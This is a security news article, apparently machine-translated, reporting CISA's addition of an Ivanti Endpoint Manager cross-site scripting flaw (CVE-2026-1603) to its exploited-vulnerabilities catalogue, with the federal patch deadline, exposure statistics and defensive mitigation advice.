CISA alert critical vulnerability in Ivanti EPM CVE-2026-1603 could exfilter credentials and force to apply patches in three weeks

The United States Agency for Infrastructure and Cybersecurity (CISA) has raised the alarm about high-gravity vulnerability in Ivanti Endpoint Manager (EPM) and has ordered federal agencies to apply patches within a period of time. 3 weeks. Registered as CVE-2026-1603, the failure allows remote attackers to draw authentication mechanisms and extract credentials through a cross-site scribing (XSS) attack that, according to the warnings, is of low complexity and does not require interaction by the user.

Ivanti EPM is an integral platform for managing endpoints and client devices in multiple operating systems and environments, including Windows, macOS, Linux, Chrome OS and IoT devices. This functional amplitude is precisely what makes your vulnerabilities an attractive target: a failure in the management server can result in access to tens or hundreds of managed equipment.

Ivanti published corrections about a month ago when he released the version Ivanti EPM 2024 SU5 which in addition to mitigating XSS corrects an SQL injection that could allow arbitrary data reading in the database. The company's statement details the available mitigations and download links in its security newsletter; it is available on its portal. official.

Although Ivanti noted that, until the publication of its notice and when it was consulted by the press, it had not received confirmed notifications of exploitation in customers, CISA decided to include vulnerability in its A catalogue of known exploited vulnerabilities (KEV) and described it as being used in real attacks, a decision that is often based on telemetry from multiple sources and observed attack patterns. CISA's own notice of new inclusion in the catalogue takes this addition and stresses that such failures are frequent vectors for malicious actors: see CISA statement and the specific entry in the catalogue can be consulted Here..

The potential scope of the problem is also reflected in public scans: the Shadowserver monitoring platform shows more than 700 instances of Ivanti EPM exposed on the Internet, mainly in North America, although there is no public data indicating how many of these instances are running vulnerable or already patched versions. The Shadowserver view offers an X-ray of the state of public exposure and can be reviewed on your dashboard: see Shadowserver statistics.

The federal authorities have not acted in isolation: inclusion in the KEV triggers a binding obligation for the civil executive agencies of the US Government. They must apply the correction within the time limit set by the operational directive. This requirement comes from BOD 22-01, the Department of National Security directive that sets times and priorities to mitigate vulnerabilities listed as exploited in nature; the full document is available on the DHS site: BOD 22-01.

It is important to put this episode in context: Ivanti and other endpoints managers have been recurring targets. In 2024, CISA already urged to secure networks against several active PMS failures, and in October of that year they also force the application of patches for another vulnerability of Ivanti detected in real environments. The reiteration of these incidents highlights two realities in the current cybersecurity landscape: on the one hand, central management tools concentrate potential impact; on the other, attack groups prioritize failures that allow initial access or exfiltration of credentials.

For security teams and infrastructure managers there are a number of practical steps that should be prioritized immediately. First, confirm whether any affected version of Ivanti EPM is being implemented and apply the patches published by the supplier. Then, if there are Internet-accessible instances, it is advisable to restrict external access by firewall and VPN, and to consider the temporary disconnection of exposed services while the correction is being used. It is also appropriate to review records and alerts to detect unusual activity around the administration panel, as well as to force the rotation of credentials and administrative keys to minimize the risk in the event of a leak. Finally, maintaining an in-depth defence policy - network segmentation, multifactor authentication and good privilege control - reduces the likelihood that an isolated vulnerability will scale up to compromise critical environments.

Ivanti provides services and products to tens of thousands of organizations through an extensive network of partners, which multiplies the importance of a coordinated and rapid response. The interaction between manufacturer notices, telemetry from organizations such as Shadowserver and agency warnings such as CISA is today the best line of defense to accelerate the mitigation of high-risk failures. If you administer EPM systems, the recommendation is clear: verify versions, apply patches and reduce public exposure without delay.

To expand technical information and follow the evolution of the incident, see the official sources linked to this text and be aware of the Ivanti bulletins and the updates of CISA, which reflect both the exploitation situation and the guidelines for responding in the federal and private environment.